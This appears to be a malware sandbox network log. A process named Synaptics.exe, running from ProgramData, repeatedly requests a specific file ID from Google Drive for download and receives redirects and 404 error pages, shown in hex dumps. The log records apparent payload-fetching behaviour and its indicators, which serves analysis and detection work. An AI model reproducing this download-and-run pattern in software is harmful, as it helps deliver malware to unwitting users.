                                                                                                                      Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error
                                                                                                                      2024-12-30 10:41:05 UTC1390INData Raw: 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 6d 63 7a 62 78 4c 38 7a 53 4d 37 6f 61 77 6d 42 38 69 36 4b 42 77 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 63 6f 6c 6f 72 3a 23 32 32 32 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 75 6e 73 65 74 3b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b
                                                                                                                      Data Ascii: 404 (Not Found)!!1</title><style nonce="mczbxL8zSM7oawmB8i6KBw">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;
                                                                                                                      2024-12-30 10:41:05 UTC122INData Raw: 62 3e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e
                                                                                                                      Data Ascii: b> <ins>Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                      94192.168.2.650046142.250.185.784434508C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                      2024-12-30 10:41:04 UTC345OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                      User-Agent: Synaptics.exe
                                                                                                                      Host: docs.google.com
                                                                                                                      Cache-Control: no-cache
                                                                                                                      Cookie: NID=520=XEpDunbM2jQWLDhJ4ZLTX75bwqESkJo47WZJ2ujDLcGVKux2c-y7Jt7SY2aovNvhVjyCrbsCNa1YWwhYHv1wufDt8UkHy2EpzgZJne1VtYUPaU7sFeHdum4NnesSqtEqek7CrfPHvlEkK3tH86_IjZKl8iznNzk3DIi_ygFA8ncsOsTOg97wWyr7
                                                                                                                      2024-12-30 10:41:05 UTC1314INHTTP/1.1 303 See Other
                                                                                                                      Content-Type: application/binary
                                                                                                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                      Pragma: no-cache
                                                                                                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                      Date: Mon, 30 Dec 2024 10:41:05 GMT
                                                                                                                      Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                      Strict-Transport-Security: max-age=31536000
                                                                                                                      Cross-Origin-Opener-Policy: same-origin
                                                                                                                      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                      Content-Security-Policy: script-src 'report-sample' 'nonce-2nk5PCzaFrO3QgAL6q_72Q' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                      Server: ESF
                                                                                                                      Content-Length: 0
                                                                                                                      X-XSS-Protection: 0
                                                                                                                      X-Frame-Options: SAMEORIGIN
                                                                                                                      X-Content-Type-Options: nosniff
                                                                                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                      Connection: close


                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                      95192.168.2.650058142.250.185.784434508C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                      2024-12-30 10:41:05 UTC345OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                      User-Agent: Synaptics.exe
                                                                                                                      Host: docs.google.com
                                                                                                                      Cache-Control: no-cache
                                                                                                                      Cookie: NID=520=XEpDunbM2jQWLDhJ4ZLTX75bwqESkJo47WZJ2ujDLcGVKux2c-y7Jt7SY2aovNvhVjyCrbsCNa1YWwhYHv1wufDt8UkHy2EpzgZJne1VtYUPaU7sFeHdum4NnesSqtEqek7CrfPHvlEkK3tH86_IjZKl8iznNzk3DIi_ygFA8ncsOsTOg97wWyr7


                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                      96192.168.2.650061142.250.185.784434508C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                      2024-12-30 10:41:05 UTC345OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                      User-Agent: Synaptics.exe
                                                                                                                      Host: docs.google.com
                                                                                                                      Cache-Control: no-cache
                                                                                                                      Cookie: NID=520=XEpDunbM2jQWLDhJ4ZLTX75bwqESkJo47WZJ2ujDLcGVKux2c-y7Jt7SY2aovNvhVjyCrbsCNa1YWwhYHv1wufDt8UkHy2EpzgZJne1VtYUPaU7sFeHdum4NnesSqtEqek7CrfPHvlEkK3tH86_IjZKl8iznNzk3DIi_ygFA8ncsOsTOg97wWyr7


                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                      97192.168.2.650062142.250.185.654434508C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                      2024-12-30 10:41:05 UTC388OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                      User-Agent: Synaptics.exe
                                                                                                                      Cache-Control: no-cache
                                                                                                                      Host: drive.usercontent.google.com
                                                                                                                      Connection: Keep-Alive
                                                                                                                      Cookie: NID=520=XEpDunbM2jQWLDhJ4ZLTX75bwqESkJo47WZJ2ujDLcGVKux2c-y7Jt7SY2aovNvhVjyCrbsCNa1YWwhYHv1wufDt8UkHy2EpzgZJne1VtYUPaU7sFeHdum4NnesSqtEqek7CrfPHvlEkK3tH86_IjZKl8iznNzk3DIi_ygFA8ncsOsTOg97wWyr7


                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                      98192.168.2.650071142.250.185.784434508C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                      2024-12-30 10:41:06 UTC345OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                      User-Agent: Synaptics.exe
                                                                                                                      Host: docs.google.com
                                                                                                                      Cache-Control: no-cache
                                                                                                                      Cookie: NID=520=XEpDunbM2jQWLDhJ4ZLTX75bwqESkJo47WZJ2ujDLcGVKux2c-y7Jt7SY2aovNvhVjyCrbsCNa1YWwhYHv1wufDt8UkHy2EpzgZJne1VtYUPaU7sFeHdum4NnesSqtEqek7CrfPHvlEkK3tH86_IjZKl8iznNzk3DIi_ygFA8ncsOsTOg97wWyr7
                                                                                                                      2024-12-30 10:41:06 UTC1314INHTTP/1.1 303 See Other
                                                                                                                      Content-Type: application/binary
                                                                                                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                      Pragma: no-cache
                                                                                                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                      Date: Mon, 30 Dec 2024 10:41:06 GMT
                                                                                                                      Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                      Strict-Transport-Security: max-age=31536000
                                                                                                                      Cross-Origin-Opener-Policy: same-origin
                                                                                                                      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                      Content-Security-Policy: script-src 'report-sample' 'nonce-Sydr4g1KBvw3yS0gfISkWQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                      Server: ESF
                                                                                                                      Content-Length: 0
                                                                                                                      X-XSS-Protection: 0
                                                                                                                      X-Frame-Options: SAMEORIGIN
                                                                                                                      X-Content-Type-Options: nosniff
                                                                                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                      Connection: close


                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                      99192.168.2.650072142.250.185.784434508C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                      2024-12-30 10:41:06 UTC345OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                      User-Agent: Synaptics.exe
                                                                                                                      Host: docs.google.com
                                                                                                                      Cache-Control: no-cache
                                                                                                                      Cookie: NID=520=XEpDunbM2jQWLDhJ4ZLTX75bwqESkJo47WZJ2ujDLcGVKux2c-y7Jt7SY2aovNvhVjyCrbsCNa1YWwhYHv1wufDt8UkHy2EpzgZJne1VtYUPaU7sFeHdum4NnesSqtEqek7CrfPHvlEkK3tH86_IjZKl8iznNzk3DIi_ygFA8ncsOsTOg97wWyr7
                                                                                                                      2024-12-30 10:41:06 UTC1314INHTTP/1.1 303 See Other
                                                                                                                      Content-Type: application/binary
                                                                                                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                      Pragma: no-cache
                                                                                                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                      Date: Mon, 30 Dec 2024 10:41:06 GMT
                                                                                                                      Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                      Strict-Transport-Security: max-age=31536000
                                                                                                                      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                      Content-Security-Policy: script-src 'report-sample' 'nonce-HTVMlteyrQGoz4ntopNg4w' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                      Cross-Origin-Opener-Policy: same-origin
                                                                                                                      Server: ESF
                                                                                                                      Content-Length: 0
                                                                                                                      X-XSS-Protection: 0
                                                                                                                      X-Frame-Options: SAMEORIGIN
                                                                                                                      X-Content-Type-Options: nosniff
                                                                                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                      Connection: close


                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                      100192.168.2.650080142.250.185.784434508C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                      2024-12-30 10:41:07 UTC345OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                      User-Agent: Synaptics.exe
                                                                                                                      Host: docs.google.com
                                                                                                                      Cache-Control: no-cache
                                                                                                                      Cookie: NID=520=XEpDunbM2jQWLDhJ4ZLTX75bwqESkJo47WZJ2ujDLcGVKux2c-y7Jt7SY2aovNvhVjyCrbsCNa1YWwhYHv1wufDt8UkHy2EpzgZJne1VtYUPaU7sFeHdum4NnesSqtEqek7CrfPHvlEkK3tH86_IjZKl8iznNzk3DIi_ygFA8ncsOsTOg97wWyr7
                                                                                                                      2024-12-30 10:41:07 UTC1314INHTTP/1.1 303 See Other
                                                                                                                      Content-Type: application/binary
                                                                                                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                      Pragma: no-cache
                                                                                                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                      Date: Mon, 30 Dec 2024 10:41:07 GMT
                                                                                                                      Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                      Strict-Transport-Security: max-age=31536000
                                                                                                                      Cross-Origin-Opener-Policy: same-origin
                                                                                                                      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                      Content-Security-Policy: script-src 'report-sample' 'nonce-n2ZrpKsqCWRBcj7oDh2pwQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                      Server: ESF
                                                                                                                      Content-Length: 0
                                                                                                                      X-XSS-Protection: 0
                                                                                                                      X-Frame-Options: SAMEORIGIN
                                                                                                                      X-Content-Type-Options: nosniff
                                                                                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                      Connection: close


                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                      101192.168.2.650082142.250.185.784434508C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                      2024-12-30 10:41:07 UTC345OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                      User-Agent: Synaptics.exe
                                                                                                                      Host: docs.google.com
                                                                                                                      Cache-Control: no-cache
                                                                                                                      Cookie: NID=520=XEpDunbM2jQWLDhJ4ZLTX75bwqESkJo47WZJ2ujDLcGVKux2c-y7Jt7SY2aovNvhVjyCrbsCNa1YWwhYHv1wufDt8UkHy2EpzgZJne1VtYUPaU7sFeHdum4NnesSqtEqek7CrfPHvlEkK3tH86_IjZKl8iznNzk3DIi_ygFA8ncsOsTOg97wWyr7
                                                                                                                      2024-12-30 10:41:08 UTC1314INHTTP/1.1 303 See Other
                                                                                                                      Content-Type: application/binary
                                                                                                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                      Pragma: no-cache
                                                                                                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                      Date: Mon, 30 Dec 2024 10:41:07 GMT
                                                                                                                      Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                      Strict-Transport-Security: max-age=31536000
                                                                                                                      Content-Security-Policy: script-src 'report-sample' 'nonce-5sLfxMSehitoNBVOspV1Dg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                      Cross-Origin-Opener-Policy: same-origin
                                                                                                                      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                      Server: ESF
                                                                                                                      Content-Length: 0
                                                                                                                      X-XSS-Protection: 0
                                                                                                                      X-Frame-Options: SAMEORIGIN
                                                                                                                      X-Content-Type-Options: nosniff
                                                                                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                      Connection: close


                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                      102192.168.2.650079142.250.185.654434508C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                      2024-12-30 10:41:07 UTC388OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                      User-Agent: Synaptics.exe
                                                                                                                      Cache-Control: no-cache
                                                                                                                      Host: drive.usercontent.google.com
                                                                                                                      Connection: Keep-Alive
                                                                                                                      Cookie: NID=520=XEpDunbM2jQWLDhJ4ZLTX75bwqESkJo47WZJ2ujDLcGVKux2c-y7Jt7SY2aovNvhVjyCrbsCNa1YWwhYHv1wufDt8UkHy2EpzgZJne1VtYUPaU7sFeHdum4NnesSqtEqek7CrfPHvlEkK3tH86_IjZKl8iznNzk3DIi_ygFA8ncsOsTOg97wWyr7
                                                                                                                      2024-12-30 10:41:07 UTC1250INHTTP/1.1 404 Not Found
                                                                                                                      X-GUploader-UploadID: AFiumC5Wzt7tSMABsoDAE84dT-0QLNTX8nq8OlzPUJE6xflE2rPXJKqDgemGV6PW41PJG-JzmfGK8Ns
                                                                                                                      Content-Type: text/html; charset=utf-8
                                                                                                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                      Pragma: no-cache
                                                                                                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                      Date: Mon, 30 Dec 2024 10:41:07 GMT
                                                                                                                      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                      Content-Security-Policy: script-src 'report-sample' 'nonce-PP3A5bt3FxO7y234y231sQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                      Cross-Origin-Opener-Policy: same-origin
                                                                                                                      Content-Length: 1652
                                                                                                                      Server: UploadServer
                                                                                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                      Content-Security-Policy: sandbox allow-scripts
                                                                                                                      Connection: close
                                                                                                                      2024-12-30 10:41:07 UTC140INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20
                                                                                                                      Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error
                                                                                                                      2024-12-30 10:41:07 UTC1390INData Raw: 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 62 44 35 5a 70 5f 72 58 37 37 65 65 72 5f 6d 4d 44 31 4e 41 6c 51 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 63 6f 6c 6f 72 3a 23 32 32 32 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 75 6e 73 65 74 3b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b
                                                                                                                      Data Ascii: 404 (Not Found)!!1</title><style nonce="bD5Zp_rX77eer_mMD1NAlQ">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;
                                                                                                                      2024-12-30 10:41:07 UTC122INData Raw: 62 3e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e
                                                                                                                      Data Ascii: b> <ins>Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                      103192.168.2.650081142.250.185.654434508C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                      2024-12-30 10:41:07 UTC388OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                      User-Agent: Synaptics.exe
                                                                                                                      Cache-Control: no-cache
                                                                                                                      Host: drive.usercontent.google.com
                                                                                                                      Connection: Keep-Alive
                                                                                                                      Cookie: NID=520=XEpDunbM2jQWLDhJ4ZLTX75bwqESkJo47WZJ2ujDLcGVKux2c-y7Jt7SY2aovNvhVjyCrbsCNa1YWwhYHv1wufDt8UkHy2EpzgZJne1VtYUPaU7sFeHdum4NnesSqtEqek7CrfPHvlEkK3tH86_IjZKl8iznNzk3DIi_ygFA8ncsOsTOg97wWyr7
                                                                                                                      2024-12-30 10:41:08 UTC1243INHTTP/1.1 404 Not Found
                                                                                                                      X-GUploader-UploadID: AFiumC7i12liUKtaDnQYvTLzyehHNKiQ5l1w4Zx-88tWmS3pEMTt_lc1CX5iEF_7_kNg9BO-
                                                                                                                      Content-Type: text/html; charset=utf-8
                                                                                                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                      Pragma: no-cache
                                                                                                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                      Date: Mon, 30 Dec 2024 10:41:08 GMT
                                                                                                                      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                      Content-Security-Policy: script-src 'report-sample' 'nonce-VoOUDqQX_woJbgsWpFf5mw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                      Cross-Origin-Opener-Policy: same-origin
                                                                                                                      Content-Length: 1652
                                                                                                                      Server: UploadServer
                                                                                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                      Content-Security-Policy: sandbox allow-scripts
                                                                                                                      Connection: close
                                                                                                                      2024-12-30 10:41:08 UTC147INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f
                                                                                                                      Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (No
                                                                                                                      2024-12-30 10:41:08 UTC1390INData Raw: 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 67 4f 67 58 39 49 61 69 48 62 71 5a 53 67 4b 2d 72 37 4f 51 6e 41 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 63 6f 6c 6f 72 3a 23 32 32 32 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 75 6e 73 65 74 3b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67
                                                                                                                      Data Ascii: t Found)!!1</title><style nonce="gOgX9IaiHbqZSgK-r7OQnA">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding
